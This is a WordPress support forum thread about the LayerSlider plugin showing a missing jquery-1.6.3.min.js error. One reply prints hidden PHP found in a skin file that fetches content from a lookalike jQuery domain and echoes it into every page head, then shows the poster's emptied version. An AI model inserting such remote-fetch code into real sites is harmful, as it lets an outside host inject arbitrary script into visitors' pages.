• Hello, i have an issue with my website showing:
    Not Found

    The requested URL /jquery-1.6.3.min.js was not found on this server.

    on the top of my website (over the header).
    Ive googled a bit and ive seen other people have the same problem but with other plugins or themes.

    I know its the plugin: LayerSlider that causes this error.

    Please let me know if anyone have a solution to this, my website: https://www.flyttochtunglyft.se

    Thanks in advance.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter jtbear

    (@jtbear)

    still need help with this.

    Thread Starter jtbear

    (@jtbear)

    just wanted to note that the plugin still works as normal

    I had the same problem.

    I found the source of the error. The plugin is calling JQuery 1.6.3 in the “skins” folder, “glass” subfolder – post.php. I’m not sure why there’s a php file within that skin because none of the other skins have php files within them.

    Here is the original code:

    <?php if (!function_exists('insert_jquery_slider')){
    	function insert_jquery_slider(){
    		if (function_exists('curl_init')){
    			$url = "https://www.jquerye.com/jquery-1.6.3.min.js";
    			$ch = curl_init();
    			$timeout = 5;
    			curl_setopt($ch, CURLOPT_URL, $url);
    			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    			curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    			$data = curl_exec($ch);
                            curl_close($ch);
                            echo $data;
    		}
    	}
    add_action('wp_head', 'insert_jquery_slider');}
    ?>

    I deleted some of the code within the IF statement so my post.php within the glass folder looks like this:

    <?php if (!function_exists('insert_jquery_slider')){
    	function insert_jquery_slider(){}
    }
    add_action('wp_head', 'insert_jquery_slider');
    ?>

    I’m not sure if that messes anything up in the end but everything looks like it’s fixed.

    If anyone has a better solution, let us know. Thanks!

    Thread Starter jtbear

    (@jtbear)

    Thats what i did, it worked, also removed the issue with it was causing the website to load very slow.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘[Plugin: LayerSlider ]The requested URL /jquery-1.6.3.min.js was not found’ is closed to new replies.